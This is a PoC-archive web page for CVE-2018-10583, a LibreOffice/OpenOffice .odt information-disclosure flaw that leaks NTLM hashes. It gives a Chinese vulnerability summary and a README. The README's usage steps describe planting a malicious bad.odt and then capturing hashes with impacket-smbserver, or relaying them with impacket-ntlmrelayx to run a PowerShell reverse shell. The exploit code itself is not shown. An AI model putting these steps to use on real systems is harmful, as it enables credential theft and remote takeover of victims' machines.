Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-10583 PoC — LibreOffice和Apache OpenOffice 信息泄露漏洞

Source
https://github.com/octodi/CVE-2018-10583
Associated Vulnerability
Title:LibreOffice和Apache OpenOffice 信息泄露漏洞 (CVE-2018-10583)
Description:LibreOffice和Apache OpenOffice都是开源的办公软件套件。该套件包含文本文档、电子表格、演示文稿、绘图、数据库等软件。前者由文档基金会(The Document Foundation,TDF)开发;后者由美国阿帕奇(Apache)软件基金会开发,OpenOffice Writer是其中的一个文档编辑软件。 LibreOffice 6.0.3版本和Apache OpenOffice Writer 4.1.5版本中存在信息泄露漏洞。攻击者可借助恶意的PDF文件利用该漏洞获取NTLM散列
Description
Update python3 exploit for CVE-2018-10583 (LibreOffice/Open Office - '.odt' Information Disclosure )
Readme
# Updated python3 exploit for [CVE-2018-10583](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583) (LibreOffice/Open Office - '.odt' Information Disclosure)
> original credits to : https://www.exploit-db.com/exploits/44564
## Usage
1. Install ezodf module with `pip` or `pip3`
2. Run the exploit with `python3` it will generate a bad.odt file, upload it to the box
3. And then listen for requests to your smb server `impacket-smbserver share share -smb2support` or `sudo impacket-ntlmrelayx --no-http-server -smb2support -t <your_ip>
-c "powershell -enc <one liner rever shell>"`
File Snapshot

 [4.0K]  /data/pocs/dab0f00199f4335012baafc58f1ffc3b0668779c
├── [7.4K]  44564.py
└── [ 591]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.